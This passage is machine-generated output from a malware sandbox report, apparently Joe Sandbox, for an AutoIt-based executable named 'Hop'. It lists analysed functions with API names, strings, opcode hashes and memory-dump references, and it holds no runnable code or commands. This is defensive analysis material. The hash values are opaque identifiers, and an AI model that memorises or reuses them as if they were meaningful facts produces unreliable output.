                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                                                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                          • API String ID: 258715311-1154884017
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3bf5e02a4ba978fef1b3ceeb92b8a3335c4abdd9348b9c2791bad94508e3907a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A719272A08A22C6EB60DF21E4446B976A4FF54BACF450239ED6D87B95DF3CD484D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E0B50 Relevance: 22.6, APIs: 15, Instructions: 131filememorywindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2779716855-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4bb9a11a91f01904cb7386835a21b5b236133c1254b1a56658643833847843f0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89516A76B04B51CAEB14CF66E804A6D33A0FB88BA8B114139EE2E83B14DF3DD485C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B15FC Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                                                                                          • API String ID: 0-3931177956
                                                                                                                                                                                                                                                                                                          • Opcode ID: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                                                                                                                                                                                                                                                                                                          • Instruction ID: f9626a52a3059989e5e13990d175f13d646aa2ce998243bf8ae5632b2aec900f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69024C76A0D642C6EB689BA5C19427C77A0FF45B48F09413DDA0F876A5EF2CE9E1D300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C49B6A8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                          • API String ID: 0-2785691316
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                                                                                                                                                                                                                                                                                                          • Instruction ID: d7c6f9c2b54cecff733c7227170f5b2d78983190472704c46a49428086204afb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0516B72A15A22CAEB50DF21D9946BC3770FF84B9CF415039EA0E87669DF38D089C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4AAA78 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 1460738036-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                                                                                                                                                                                                                                                                                                          • Instruction ID: e8274a4c1e4daa2cadceca16ab08084064b76b983e6add0262980e04422009c0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9771E626A0C682DBF720DF2194502BD67A2BFC4B8CF548039DA4E97681DEBCE589C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B3C14 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadStringwprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 3297454147-3080491070
                                                                                                                                                                                                                                                                                                          • Opcode ID: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                                                                                                                                                                                                                                                                                                          • Instruction ID: 11dce8a7dc2647dcf54e1b7fc426e86a01a895f61424054a55b2ea922a2445e0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83619331B28A52D2EB10DB65E8519ED6361FFC4748F40003AEA4DD7A9ADF7CE59AC700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4A7A88 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 4051287042-2268648507
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                                                                                                                                                                                                                                                                                                          • Instruction ID: 59897e55918146fa2211249bc17df917983c0040a4c3aae405e670d106114f56
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6518F62B28A52D1EB00EB70E8518ED6322FFC4758F90503AE94DD769ADF7CD54AC740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4315EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1974058525-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                                                                                                                                                                                                                                                                                                          • Instruction ID: ad1dc712fc287826e371818f731f086c913d119ed12d8f3f01c6b1169cdef32f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC912975A0AA46C2EF649F65E460A7823A0FFD8B98F584039D94EC7B95CF3CE491D301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C431504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 1268354404-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 003ffa3cb96adaffa078e343651ec5c233eeb56cb4dae82f3b52f731961d4d90
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C614C76A09642CAEB14DF35E850A7927A1BF98BACF145539ED0E87B94DF3CE480C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B3E90 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadStringwprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 3297454147-2391861430
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f47e7ba8d774a4c57d63f0e697d6142af3855e62eb7e92f5f5d1c3e630d33d4c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E71B432B29A52D2EB00DB65E8409EDA361FFC475CF40103AEA0D87A9ADF7DE585C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DB590 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 3821898125-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8855074f336ea8578248e0e2358e234ec77145be87fe63e6cd75c991495f5e70
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70414E76A08781C7EB60DF25A44475A73A1FB897A4F504239EA9D87B99CF3CD485CF00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C434B64 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                                                                                                                                                                                                          • API String ID: 2667193904-1575078665
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 503343711e62da09e674e63c3d7904cd47d925ca63f25a970b3f84d0c3276f6d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE917E22A18A47C5EB20DB24EC505BD73A4FF88768F80023AE55DC3AA9DF7CE595C701
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4343D8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
